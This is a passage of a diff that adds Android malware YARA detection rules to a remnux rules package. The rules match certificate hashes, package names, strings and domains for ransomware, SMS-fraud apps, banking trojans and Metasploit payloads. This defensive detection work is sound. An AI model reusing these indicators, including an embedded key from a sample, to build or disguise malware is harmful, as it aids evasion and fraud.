+		androguard.certificate.sha1("B4142B617997345809736842147F97F46059FDE3") or
+		androguard.certificate.sha1("950A545EA156A0E44B3BAB5F432DCD35005A9B70") or
+		androguard.certificate.sha1("DE18FA0C68E6C9E167262F1F4ED984A5F00FD78C") or
+		androguard.certificate.sha1("81E8E202C539F7AEDF6138804BE870338F81B356") or
+		androguard.certificate.sha1("5A051047F2434DDB2CAA65898D9B19ED9665F759")
+		
+}
diff -Nru remnux-rules-0.0.3/yara/Mobile_Malware/Android_malware_ChinesePorn.yar remnux-rules-0.0.4/yara/Mobile_Malware/Android_malware_ChinesePorn.yar
--- remnux-rules-0.0.3/yara/Mobile_Malware/Android_malware_ChinesePorn.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/Mobile_Malware/Android_malware_ChinesePorn.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,75 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+*/
+
+/*
+	Androguard module used in this rule file is under development by people at https://koodous.com/.
+
+	You can get it, along with installation instructions, at https://github.com/Koodous/androguard-yara
+*/
+
+import "androguard"
+
+rule sensual_woman: chinese android
+{
+  meta:
+		author = "https://twitter.com/plutec_net"
+		reference = "https://koodous.com/"
+	condition:
+		androguard.package_name(/com.phone.gzlok.live/)
+		or androguard.package_name(/com.yongrun.app.sxmn/)
+		or androguard.package_name(/com.wnm.zycs/)
+		or androguard.package_name(/com.charile.chen/i)
+		or androguard.package_name(/com.sp.meise/i)
+		or androguard.package_name(/com.legame.wfxk.wjyg/)
+		or androguard.package_name(/com.video.uiA/i)
+}
+
+rule chinese2 : sms_sender android
+{
+  meta:
+		author = "https://twitter.com/plutec_net"
+		reference = "https://koodous.com/"
+	condition:
+		androguard.package_name(/com.adr.yykbplayer/) or 
+		androguard.package_name(/sdej.hpcite.icep/) or
+		androguard.package_name(/p.da.wdh/) or
+		androguard.package_name(/com.shenqi.video.sjyj.gstx/) or
+		androguard.package_name(/cjbbtwkj.xyduzi.fa/) or
+		androguard.package_name(/kr.mlffstrvwb.mu/)
+}
+
+rule chinese_porn : SMSSend android
+{
+  meta:
+		author = "https://twitter.com/plutec_net"
+		reference = "https://koodous.com/"
+	condition:
+		androguard.package_name("com.tzi.shy") or
+		androguard.package_name("com.shenqi.video.nfkw.neim")
+}
+
+rule chineseporn4 : SMSSend android
+{
+  meta:
+		author = "https://twitter.com/plutec_net"
+		reference = "https://koodous.com/"
+	condition:
+		androguard.activity(/com\.shenqi\.video\.Welcome/) or
+		androguard.package_name("org.mygson.videoa.zw")
+}
+
+rule chineseporn5 : SMSSend android
+{
+  meta:
+		author = "https://twitter.com/plutec_net"
+		reference = "https://koodous.com/"
+	condition:
+		androguard.package_name("com.shenqi.video.ycef.svcr") or 
+		androguard.package_name("dxas.ixa.xvcekbxy") or
+		androguard.package_name("com.video.ui") or 
+		androguard.package_name("com.qq.navideo") or
+		androguard.package_name("com.android.sxye.wwwl") or
+		androguard.certificate.issuer(/llfovtfttfldddcffffhhh/)
+		
+}
diff -Nru remnux-rules-0.0.3/yara/Mobile_Malware/Android_malware_Dropper.yar remnux-rules-0.0.4/yara/Mobile_Malware/Android_malware_Dropper.yar
--- remnux-rules-0.0.3/yara/Mobile_Malware/Android_malware_Dropper.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/Mobile_Malware/Android_malware_Dropper.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,16 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as
+    long as you use it under this license.
+*/
+
+rule dropper:realshell android {
+    meta:
+        author = "https://twitter.com/plutec_net"
+        reference = "https://koodous.com/"
+        source = "https://blog.malwarebytes.org/mobile-2/2015/06/complex-method-of-obfuscation-found-in-dropper-realshell/"
+    strings:
+        $b = "Decrypt.malloc.memset.free.pluginSMS_encrypt.Java_com_skymobi_pay_common_util_LocalDataDecrpty_Encrypt.strcpy"
+    
+    condition:
+        $b
+}
diff -Nru remnux-rules-0.0.3/yara/Mobile_Malware/Android_malware_Fake_MosKow.yar remnux-rules-0.0.4/yara/Mobile_Malware/Android_malware_Fake_MosKow.yar
--- remnux-rules-0.0.3/yara/Mobile_Malware/Android_malware_Fake_MosKow.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/Mobile_Malware/Android_malware_Fake_MosKow.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,27 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+*/
+
+
+//41dce59ace9cce668e893c9d2c35d6859dc1c86d631a0567bfde7d34dd5cae0b
+//61f7909512c5caf6dd125659428cf764631d5a52c59c6b50112af4a02047774c
+//2c89d0d37257c90311436115c1cf06295c39cd0a8c117730e07be029bd8121a0
+rule moscow_fake : banker androoid
+{
+	meta:
+	  author = "Fernando Denis"
+		reference = "https://koodous.com/ https://twitter.com/fdrg21"
+		description = "Moskow Droid Development"
+		thread_level = 3
+		in_the_wild = true
+
+	strings:
+		$string_a = "%ioperator%"
+		$string_b = "%imodel%"
+		$string_c = "%ideviceid%"
+		$string_d = "%ipackname%"
+		$string_e = "VILLLLLL"
+
+	condition:
+		all of ($string_*)
+}
diff -Nru remnux-rules-0.0.3/yara/Mobile_Malware/Android_malware_HackingTeam.yar remnux-rules-0.0.4/yara/Mobile_Malware/Android_malware_HackingTeam.yar
--- remnux-rules-0.0.3/yara/Mobile_Malware/Android_malware_HackingTeam.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/Mobile_Malware/Android_malware_HackingTeam.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,51 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+*/
+
+/*
+	Androguard module used in this rule file is under development by people at https://koodous.com/.
+
+	You can get it, along with installation instructions, at https://github.com/Koodous/androguard-yara
+*/
+
+import "androguard"
+
+rule hacking_team : stcert android
+{
+	meta:
+		author = "Fernando Denis https://twitter.com/fdrg21"
+		reference = "https://koodous.com/"
+		description = "This rule detects the apk related to hackingteam - These certificates are presents in mailboxes od hackingteam"
+		samples = "c605df5dbb9d9fb1d687d59e4d90eba55b3201f8dd4fa51ec80aa3780d6e3e6e"
+
+	strings:
+		$string_a_1 = "280128120000Z0W1"
+		$string_a_2 = "E6FFF4C5062FBDC9"
+		$string_a_3 = "886FEC93A75D2AC1"
+		$string_a_4 = "121120104150Z"
+		
+		$string_b_1 = "&inbox_timestamp > 0 and is_permanent=1"
+		$string_b_2 = "contact_id = ? AND mimetype = ?"
+		
+		$string_c = "863d9effe70187254d3c5e9c76613a99"
+		
+		$string_d = "nv-sa1"
+
+	condition:
+		(any of ($string_a_*) and any of ($string_b_*) and $string_c and $string_d) or
+		androguard.certificate.sha1("B1BC968BD4F49D622AA89A81F2150152A41D829C") or 	  
+		androguard.certificate.sha1("3FEC88BA49773680E2A3040483806F56E6E8502E") or 
+		androguard.certificate.sha1("B0A4A4880FA5345D6B3B00C0C588A39815D3872E") or 
+		androguard.certificate.sha1("EC2184676D4AE153E63987326666BA0C554A4A60") or 
+		androguard.certificate.sha1("A7394CBAB09D35C69DA7FABB1A7870BE987A5F77")	or
+		androguard.certificate.sha1("A1131C7F816D65670567D6C7041F30E380754022") or
+		androguard.certificate.sha1("4E40663CC29C1FE7A436810C79CAB8F52474133B") or
+		androguard.certificate.sha1("159B4F6C03D43F27339E06ABFD2DE8D8D65516BC") or
+		androguard.certificate.sha1("3EEE4E45B174405D64F877EFC7E5905DCCD73816") or
+		androguard.certificate.sha1("9CE815802A672B75C078D920A5D506BBBAC0D5C9") or
+		androguard.certificate.sha1("C4CF31DBEF79393FD2AD617E79C27BFCF19EFBB3") or
+		androguard.certificate.sha1("2125821BC97CF4B7591E5C771C06C9C96D24DF8F")
+		//97257C6D8F6DA60EA27D2388D9AE252657FF3304 this certification could be stolen
+		//03EA873D5D13707B0C278A0055E452416054E27B this certification could be stolen
+		//B8D5E3F0BCAD2EB03BB34AEE2B3F63FC5162C56B this certification could be stolen
+}
diff -Nru remnux-rules-0.0.3/yara/Mobile_Malware/Android_Malware_Ramsonware.yar remnux-rules-0.0.4/yara/Mobile_Malware/Android_Malware_Ramsonware.yar
--- remnux-rules-0.0.3/yara/Mobile_Malware/Android_Malware_Ramsonware.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/Mobile_Malware/Android_Malware_Ramsonware.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,111 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "cuckoo"
+
+rule ransomware : svpeng android
+{
+	meta:
+		author = "Fernando Denis https://twitter.com/fdrg21"
+		reference = "https://koodous.com/"
+		description = "Ransomware"
+		in_the_wild = true
+
+	strings:
+		$a =  {6e 64 20 79 6f 75 72 27 73 20 64 65 76 69 63 65 20 77 69 6c 6c 20 72 65 62 6f 6f 74 20 61 6e 64}
+		$b = "ADD_DEVICE_ADMI"
+
+	condition:
+		$a and $b
+}
+
+
+rule Ransomware : banker android
+{
+	meta:
+		author = "Fernando Denis https://twitter.com/fdrg21"
+		reference = "https://koodous.com/"
+		description = "Ransomware Test 2"
+		thread_level = 3
+		in_the_wild = true
+
+	strings:
+
+		$strings_a = "!2,.B99^GGD&R-"
+		$strings_b = "22922222222222222222Q^SAAWA"
+		$strings_c = "t2222222222229222Q^SAAWA"
+
+	
+
+	condition:
+		any of ($strings_*)
+}
+
+rule koler_domains : android
+{
+	meta:
+ 		author = "https://twitter.com/jsmesa"
+		reference = "https://koodous.com/"
+		description = "Old Koler.A domains examples"
+		sample = "2e1ca3a9f46748e0e4aebdea1afe84f1015e3e7ce667a91e4cfabd0db8557cbf"
+
+	condition:
+		cuckoo.network.dns_lookup(/police-scan-mobile.com/) or
+		cuckoo.network.dns_lookup(/police-secure-mobile.com/) or
+		cuckoo.network.dns_lookup(/mobile-policeblock.com/) or
+		cuckoo.network.dns_lookup(/police-strong-mobile.com/) or
+		cuckoo.network.dns_lookup(/video-porno-gratuit.eu/) or
+		cuckoo.network.dns_lookup(/video-sartex.us/) or 
+		cuckoo.network.dns_lookup(/policemobile.biz/)
+}
+
+rule koler_builds : android
+{
+	meta:
+		author = "https://twitter.com/jsmesa"
+		reference = "https://koodous.com/"
+		description = "Koler.A builds"
+
+	strings:
+		$0 = "buildid"
+		$a = "DCEF055EEE3F76CABB27B3BD7233F6E3"
+		$b = "C143D55D996634D1B761709372042474"
+		
+	condition:
+		$0 and ($a or $b)
+		
+}
+
+rule koler_class : android
+{
+	meta:
+		author = "https://twitter.com/jsmesa"
+		reference = "https://koodous.com/"
+		description = "Koler.A class"
+
+	strings:
+		$0 = "FIND_VALID_DOMAIN"
+		$a = "6589y459"
+		
+	condition:
+		$0 and $a
+		
+}
+
+rule koler_D : android
+{
+	meta:
+		author = "https://twitter.com/jsmesa"
+		reference = "https://koodous.com/"
+		description = "Koler.D class"
+
+	strings:
+		$0 = "ZActivity"
+		$a = "Lcom/android/zics/ZRuntimeInterface"
+		
+	condition:
+		($0 and $a)
+		
+}
diff -Nru remnux-rules-0.0.3/yara/Mobile_Malware/Android_malware_SMSsender.yar remnux-rules-0.0.4/yara/Mobile_Malware/Android_malware_SMSsender.yar
--- remnux-rules-0.0.3/yara/Mobile_Malware/Android_malware_SMSsender.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/Mobile_Malware/Android_malware_SMSsender.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,99 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+*/
+
+/*
+	Androguard module used in this rule file is under development by people at https://koodous.com/.
+
+	You can get it, along with installation instructions, at https://github.com/Koodous/androguard-yara
+*/
+
+import "androguard"
+
+rule smspay_chinnese : hejupay android
+{
+    meta:
+		author = "Fernando Denis https://twitter.com/fdrg21"
+		reference = "https://koodous.com/"
+		
+	strings:
+	  $a = "MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC/Jvgb0/jSRWi7i4J9IwO72KZw404kj02A97ExbUefVeE7yyWSTbKw5sYlKXCtaoQwWr19j0Y+xb6+h2BRuNx307BV/QpG6DnPg+Lx8fPPvhbhOudgKb/XuZPaz/GJbTpwzTbBmT+mI1QTRLyAKDxSjGWYvoPFVz82RxcAblV/twIDAQAB"
+
+	  $b = "MIICeAIBADANBgkqhkiG9w0BAQEFAASCAmIwggJeAgEAAoGBAL8m+BvT+NJFaLuLgn0jA7vYpnDjTiSPTYD3sTFtR59V4TvLJZJNsrDmxiUpcK1qhDBavX2PRj7Fvr6HYFG43HfTsFX9CkboOc+D4vHx88++FuE652Apv9e5k9rP8YltOnDNNsGZP6YjVBNEvIAoPFKMZZi+g8VXPzZHFwBuVX+3AgMBAAECgYBLYR6uOqUApoZqjtVia5BpX0Ijej+ygyBZH1Qs3Z9E4iTz42RpkWJKCHdS6Eia2kpOlznqbbmRv4E8uT3ufCvUFexjR5ClGVKJ+XHXxqS75+KT38wGZZ1bW0pK4sT1/aGLrt5/netwuzMi/YFNfAKRPqvRXuNcxNLhMhs2efLKIQJBAPGea2UXVWd0Ti8ClA8hiWPSNCPtcp41Dh2H0YczrFmO2zafPPJih2GQY5txszwBLbjxFCY8/WhrYAqx0itMrgsCQQDKh5U1NfpRvk0Hu8iBRB/LPyGimz+WM/chFSC65SlS/cml3U7hUOj2lRGPz+bm68624H0KLviqpBJpmayvbbyFAkEA1NNFJ9uAx8rDn1b3EcjpmvqqIMdjwYVcNJjQ7/WNJ6nU3+0toxc0xrSHeIGTbhRfsNrxc6kfUV3bUDBHvwog9wJBAI+fRH1ekOwlAqVIUnDw6YcNdwHEDHysz0TDodlHp112Ieign06DPSGYJsMQURNTB92CJsnw82C3R2Nhmicxr60CQQCN466JF9GJRZipO64OYw/ElMac7vXgTeGMvYZ2/yfX5CRCLua4DygD1Ju0eMXpea9og/EtwCTV0RVpFc9SSN8V"
+
+	condition:
+		$a or $b
+}
+
+
+rule smsfraud : ganga android
+{
+	meta:
+		author = "Fernando Denis https://twitter.com/fdrg21"
+		reference = "https://koodous.com/"
+		description = "smsfraud chinese"
+		sample = "e6ef34577a75fc0dc0a1f473304de1fc3a0d7d330bf58448db5f3108ed92741b"
+
+	strings:
+		$string_a_1 = "HHHEEEEEEBBBBBB??????;;;;;;888888444444000000,,,,,,''''''''''''######OOO###"
+		$string_a_2 = "2e6081a2-a063-45c7-ab90-5db596e42c7c"
+
+	condition:
+		androguard.package_name("com.yr.sx") or
+		all of ($string_a_*) or
+		androguard.activity(/com.snowfish.cn.ganga.offline.helper.SFGameSplashActivity/)
+		
+		
+}
+
+
+rule sms_fraud : MSACM32 android
+{
+		meta:
+		author = "Fernando Denis https://twitter.com/fdrg21"
+		reference = "https://koodous.com/"
+		description = "sms-fraud examples"
+		sample = "8b9cabd2dafbba57bc35a19b83bf6027d778f3b247e27262ced618e031f9ca3d c52112b45164b37feeb81e0b5c4fcbbed3cfce9a2782a2a5001fb37cfb41e993"
+
+	strings:
+		$string_a = "MSACM32.dll"
+		$string_b = "android.provider.Telephony.SMS_RECEIVED"
+		$string_c = "MAIN_TEXT_TAG"
+
+	condition:
+		all of ($string_*) and
+		androguard.permission(/android.permission.SEND_SMS/)
+		
+}
+
+rule sms_fraud_gen : generic android
+{
+		meta:
+		author = "Fernando Denis https://twitter.com/fdrg21"
+		reference = "https://koodous.com/"
+		description = "This is just an example"
+		thread_level = 3
+		in_the_wild = true
+
+	strings:
+		$a = "080229013346Z"
+		$c = "350717013346Z0"
+		$b = "NUMBER_CHAR_EXP_SIGN"
+
+	condition:
+		$a and $b and $c and
+		androguard.permission(/android.permission.SEND_SMS/)
+}
+
+rule smsfraud_apk : android
+{
+	meta:
+		author = "https://twitter.com/plutec_net"
+		reference = "https://koodous.com/"
+		description = "This rule detects apks related with sms fraud"
+		sample = "79b35a99f16de6912d6193f06361ac8bb75ea3a067f3dbc1df055418824f813c"
+
+	condition:
+		androguard.certificate.sha1("9E1B8719D80656E9EADAAB4251B2CFB4C8188835")
+		
+}
diff -Nru remnux-rules-0.0.3/yara/Mobile_Malware/Android_Malware_Tinhvan.yar remnux-rules-0.0.4/yara/Mobile_Malware/Android_Malware_Tinhvan.yar
--- remnux-rules-0.0.3/yara/Mobile_Malware/Android_Malware_Tinhvan.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/Mobile_Malware/Android_Malware_Tinhvan.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,24 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+/*
+	Androguard module used in this rule file is under development by people at https://koodous.com/.
+
+	You can get it, along with installation instructions, at https://github.com/Koodous/androguard-yara
+*/
+
+import "androguard"
+
+rule tinhvan : android
+{
+	meta:
+	  author = "https://twitter.com/plutec_net"
+		reference = "https://koodous.com/"
+		sample = "0f7e995ff7075af2d0f8d60322975d610e888884922a89fda9a61c228374c5c5"
+
+	condition:
+		androguard.certificate.sha1("0DFBBDB7735517748C3DEF3B6DEC2A800182D1D5")
+		
+}
diff -Nru remnux-rules-0.0.3/yara/Mobile_Malware/Android_Malware_Towelroot.yar remnux-rules-0.0.4/yara/Mobile_Malware/Android_Malware_Towelroot.yar
--- remnux-rules-0.0.3/yara/Mobile_Malware/Android_Malware_Towelroot.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/Mobile_Malware/Android_Malware_Towelroot.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,64 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+*/
+
+/*
+	Androguard module used in this rule file is under development by people at https://koodous.com/.
+
+	You can get it, along with installation instructions, at https://github.com/Koodous/androguard-yara
+*/
+
+import "androguard"
+
+rule towelhacking_behaviour
+{
+	meta:
+		author = "Fernando Denis Ramirez https://twitter.com/fdrg21"
+		reference = "https://koodous.com/"
+		description = "Search probably apks relationships"
+
+
+	condition:
+		androguard.certificate.sha1("180ADFC5DE49C0D7F643BD896E9AAC4B8941E44E") or 
+		( androguard.activity(/net.prospectus.*/i) and androguard.permission(/android.permission.WRITE_CONTACT/) and
+		androguard.permission(/android.permission.ACCESS_COARSE_UPDATES/))
+		
+}
+
+rule towelhacking_analysis
+{
+	meta:
+		author = "Fernando Denis Ramirez https://twitter.com/fdrg21"
+		reference = "https://koodous.com/"
+		description = "From static analysis"
+		sample = "258c34428e214d2a49d3de776db98d26e0bd0abc452249c8be8cdbcb10218e8c"
+
+	strings:
+		$analysis_a = "LoganberryApplication"
+		$analysis_b = "attachBaseContext"
+		$analysis_c = "Obstetric"
+
+	condition:
+		all of them
+		
+}
+
+rule towelhacking_cromosome
+{
+	meta:
+		author = "Fernando Denis Ramirez https://twitter.com/fdrg21"
+		reference = "https://koodous.com/"
+		description = "From cromosome.py"
+
+	strings:
+		$cromosome_a = "res/xml/device_admin_data.xml]"
+	  	$cromosome_b = "data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAIAAAACABAMAAAAxEHz4AAAAGFBMVEVMaXGUwUWTwEaTwEaTwEaTwEaVwUWTwEalNfqIAAAAB3RSTlMALozOuetYmPN8xgAAAbFJREFUeF7t2E9L+zAcx/FP1i3n7PfHXauivW7K3HWAY1dFoNci2l61Lvs8fUOxZYW22RdBBub1AN4kX7KQDqcvCILgDC0aUlcGhzaQ+j/HAb2HlC5buTXEEoMGlgZikzkAledTAKM95HSJPxs6T9eYrSGHZMMvuyXkoLZs2AxyCQ98GEi9sqWEkGYb1/INMGUtFW9iRDLWdWGhtuQCEgW5a+ZIgwn5AQFVjQ0zViwQkYwFgYjVCorDFfBdtgMyU80MkFC2h5SOXfGLXbIqyg9B2xzHGrODZAgzdioFM+y0E5zjThbHurzthl9Bb24M8HLfzQCXT+cYsiX3QMJuBn9Jazz3CLOBwIrko+8IzvsDmk7pO4Lv/YExPT/rxBOI6NjTCIRACIRACITA2BeY0XnoD4x8D5WITtwfUKnnraVScof+AArfk/cfbTwU0CveYdDUYCgANYXPYKBx+oEQKL772I7YaS/+cG+zMY6m8vyFDnOnqpV5nkFkVI+tvmWAXxkIgRDQdGxzO7xBSqX1B9qEzhpiBcmHei3WQEyn9d9fr+QCcji7yFDB8zV+QhAEQfAJcs5K2TAQqxAAAAAASUVORK5CYII="
+
+		$cromosome_c = "device_admin_desc"
+		$cromosome_d = "PillagedActivity"
+		$cromosome_e = "EpigraphyService"
+
+	condition:
+		($cromosome_a and $cromosome_b) or ($cromosome_c and $cromosome_d and $cromosome_e)
+		
+}
diff -Nru remnux-rules-0.0.3/yara/Mobile_Malware/Android_malware_xbot007.yar remnux-rules-0.0.4/yara/Mobile_Malware/Android_malware_xbot007.yar
--- remnux-rules-0.0.3/yara/Mobile_Malware/Android_malware_xbot007.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/Mobile_Malware/Android_malware_xbot007.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,16 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+*/
+
+
+rule xbot007 : android
+{
+	meta:
+		reference = "https://github.com/maldroid/maldrolyzer/blob/master/plugins/xbot007.py"
+
+	strings:
+		$a = "xbot007"
+
+	condition:
+		any of them
+}
diff -Nru remnux-rules-0.0.3/yara/Mobile_Malware/Android_mapin.yar remnux-rules-0.0.4/yara/Mobile_Malware/Android_mapin.yar
--- remnux-rules-0.0.3/yara/Mobile_Malware/Android_mapin.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/Mobile_Malware/Android_mapin.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,44 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) 
+    and open to any user or organization, as long as you use it under this license.
+*/
+
+rule dropperMapin : android
+{
+    meta:
+        author = "https://twitter.com/plutec_net"
+        source = "https://koodous.com/"
+        reference = "http://www.welivesecurity.com/2015/09/22/android-trojan-drops-in-despite-googles-bouncer/"
+        description = "This rule detects mapin dropper files"
+        sample = "7e97b234a5f169e41a2d6d35fadc786f26d35d7ca60ab646fff947a294138768"
+        sample2 = "bfd13f624446a2ce8dec9006a16ae2737effbc4e79249fd3d8ea2dc1ec809f1a"
+
+    strings:
+        $a = ":Write APK file (from txt in assets) to SDCard sucessfully!"
+        $b = "4Write APK (from Txt in assets) file to SDCard  Fail!"
+        $c = "device_admin"
+
+    condition:
+        all of them
+}
+
+
+rule Mapin : android
+{
+    meta:
+        author = "https://twitter.com/plutec_net"
+        source = "https://koodous.com/"
+        reference = "http://www.welivesecurity.com/2015/09/22/android-trojan-drops-in-despite-googles-bouncer/"
+        description = "Mapin trojan, not for droppers"
+        sample = "7f208d0acee62712f3fa04b0c2744c671b3a49781959aaf6f72c2c6672d53776"
+
+    strings:
+        $a = "138675150963" //GCM id
+        $b = "res/xml/device_admin.xml"
+        $c = "Device registered: regId ="
+        
+
+    condition:
+        all of them
+        
+}
diff -Nru remnux-rules-0.0.3/yara/Mobile_Malware/Android_Marcher_2.yar remnux-rules-0.0.4/yara/Mobile_Malware/Android_Marcher_2.yar
--- remnux-rules-0.0.3/yara/Mobile_Malware/Android_Marcher_2.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/Mobile_Malware/Android_Marcher_2.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,61 @@
+rule marcher
+{
+	meta:
+		author = "Antonio S. <asanchez@koodous.com>"
+		source = "https://analyst.koodous.com/rulesets/890"
+		description = "This rule detects is to detect a type of banking malware"
+		sample = "33b1a9e4a1591c1a39fdd5295874e365dbde9448098254a938525385498da070"
+
+	strings:
+		$a = "cmVudCYmJg=="
+		$b = "dXNzZCYmJg=="
+
+	condition:
+		all of them
+		
+}
+
+rule marcher2
+{
+	meta:
+		author = "Antonio S. <asanchez@koodous.com>"
+		source = "https://analyst.koodous.com/rulesets/890"
+	strings:
+		$a = "HDNRQ2gOlm"
+		$b = "lElvyohc9Y1X+nzVUEjW8W3SbUA"
+	condition:
+		all of them
+		
+}
+
+rule marcher3
+{
+	meta:
+		author = "Antonio S. <asanchez@koodous.com>"
+		source = "https://analyst.koodous.com/rulesets/890"
+		sample1 = "087710b944c09c3905a5a9c94337a75ad88706587c10c632b78fad52ec8dfcbe"
+		sample2 = "fa7a9145b8fc32e3ac16fa4a4cf681b2fa5405fc154327f879eaf71dd42595c2"
+	strings:
+		$a = "certificado # 73828394"
+		$b = "A compania TMN informa que o vosso sistema Android tem vulnerabilidade"
+		
+	condition:
+		all of them
+}
+
+rule marcher_v2
+{
+	meta:
+		description = "This rule detects a new variant of Marcher"
+		sample = "27c3b0aaa2be02b4ee2bfb5b26b2b90dbefa020b9accc360232e0288ac34767f"
+		author = "Antonio S. <asanchez@koodous.com>"
+		source = "https://analyst.koodous.com/rulesets/1301"
+	strings:
+		$a = /assets\/[a-z]{1,12}.datPK/
+		$b = "mastercard_img"
+		$c = "visa_verifed"
+
+	condition:
+		all of them
+
+}
diff -Nru remnux-rules-0.0.3/yara/Mobile_Malware/Android_MazarBot_z.yar remnux-rules-0.0.4/yara/Mobile_Malware/Android_MazarBot_z.yar
--- remnux-rules-0.0.3/yara/Mobile_Malware/Android_MazarBot_z.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/Mobile_Malware/Android_MazarBot_z.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,42 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+*/
+
+/*
+	Androguard module used in this rule file is under development by people at https://koodous.com/.
+
+	You can get it, along with installation instructions, at https://github.com/Koodous/androguard-yara
+*/
+
+import "androguard"
+
+
+rule android_mazarBot_z: android
+{
+	meta:
+	  author = "https://twitter.com/5h1vang"
+	  reference_1 = "https://heimdalsecurity.com/blog/security-alert-mazar-bot-active-attacks-android-malware/"
+	  description = "Yara detection for MazarBOT"
+	  sample = "73c9bf90cb8573db9139d028fa4872e93a528284c02616457749d40878af8cf8"
+
+	strings:
+		$str_1 = "android.app.extra.ADD_EXPLANATION"
+		$str_2 = "device_policy"
+		$str_3 = "content://sms/"
+		$str_4 = "#admin_start"
+		$str_5 = "kill call"
+		$str_6 = "unstop all numbers"
+		
+	condition:		
+		androguard.certificate.sha1("50FD99C06C2EE360296DCDA9896AD93CAE32266B") or
+		
+		(androguard.package_name("com.mazar") and
+		androguard.activity(/\.DevAdminDisabler/) and 
+		androguard.receiver(/\.DevAdminReceiver/) and 
+		androguard.service(/\.WorkerService/i)) or 
+		
+		androguard.permission(/android.permission.INTERNET/) and
+		androguard.permission(/android.permission.SEND_SMS/) and
+		androguard.permission(/android.permission.CALL_PHONE/) and
+		all of ($str_*)
+}
diff -Nru remnux-rules-0.0.3/yara/Mobile_Malware/Android_Metasploit.yar remnux-rules-0.0.4/yara/Mobile_Malware/Android_Metasploit.yar
--- remnux-rules-0.0.3/yara/Mobile_Malware/Android_Metasploit.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/Mobile_Malware/Android_Metasploit.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,40 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+*/
+
+
+rule android_meterpreter : android
+{
+    meta:
+        author="73mp74710n"
+        ref = "https://github.com/zombieleet/yara-rules/blob/master/android_metasploit.yar"
+        comment="Metasploit Android Meterpreter Payload"
+        
+    strings:
+	$checkPK = "META-INF/PK"
+	$checkHp = "[Hp^"
+	$checkSdeEncode = /;.Sk/
+	$stopEval = "eval"
+	$stopBase64 = "base64_decode"
+	
+    condition:
+	any of ($check*) or any of ($stop*)
+}
+
+rule android_metasploit : android
+{
+	meta:
+		author = "https://twitter.com/plutec_net"
+		description = "This rule detects apps made with metasploit framework"
+		sample = "cb9a217032620c63b85a58dde0f9493f69e4bda1e12b180047407c15ee491b41"
+
+	strings:
+		$a = "*Lcom/metasploit/stage/PayloadTrustManager;"
+		$b = "(com.metasploit.stage.PayloadTrustManager"
+		$c = "Lcom/metasploit/stage/Payload$1;"
+		$d = "Lcom/metasploit/stage/Payload;"
+
+	condition:
+		all of them
+		
+}
diff -Nru remnux-rules-0.0.3/yara/Mobile_Malware/Android_Overlayer.yar remnux-rules-0.0.4/yara/Mobile_Malware/Android_Overlayer.yar
--- remnux-rules-0.0.3/yara/Mobile_Malware/Android_Overlayer.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/Mobile_Malware/Android_Overlayer.yar	2016-06-24 20:07:22.000000000 +0000
